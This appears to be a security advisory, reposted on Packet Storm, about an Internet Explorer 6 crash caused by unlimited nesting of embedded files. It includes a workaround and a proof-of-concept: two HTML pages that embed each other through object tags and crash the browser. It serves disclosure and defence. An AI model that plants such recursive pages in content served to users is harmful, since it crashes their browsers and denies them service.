There is a bug in Microsoft Internet Explorer, which causes a crash in it. The bug occurs, because Microsoft Internet Explorer doesn't limit the depth of embedded files.
8f25fcb6f63c485539677e1666ef70f07aaf092897e24335b28034b74164bcd9Microsoft Internet Explorer - Crash on processing embedded files with
endless loop (05/28/2005)
Description:
There is a bug in Microsoft Internet Explorer, which causes a crash in it.
The bug occurs, because Microsoft Internet Explorer doesn't limit the depth
of embedded files.
Affected software:
Microsoft Internet Explorer
Workaround:
Deactivate "ActiveX" in the IE options menu.
Proof-of-Concept exploit:
Page #1 (save as "btf1.htm"):
<html><head><title>BTF - MSIE crash</title></head><body>
<object data="./btf2.htm" width="0" height="0"></object>
</body></html>
Page #2 (save as "btf2.htm"):
<html><head><title>BTF - MSIE crash</title></head><body>
<object data="./btf1.htm" width="0" height="0"></object>
</body></html>
Date of discovery:
26. September 2003
Tested software:
Microsoft Internet Explorer 6 SP2 (6.0.2900.2180.xpsp_sp2_gdr.050301-1519)
on a fully patched Windows XP SP2 system.
DLL versions:
MSHTML.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
BROWSEUI.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
SHDOCVW.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
SHLWAPI.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
URLMON.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
WININET.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
Regards,
Benjamin Tobias Franz
Germany
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed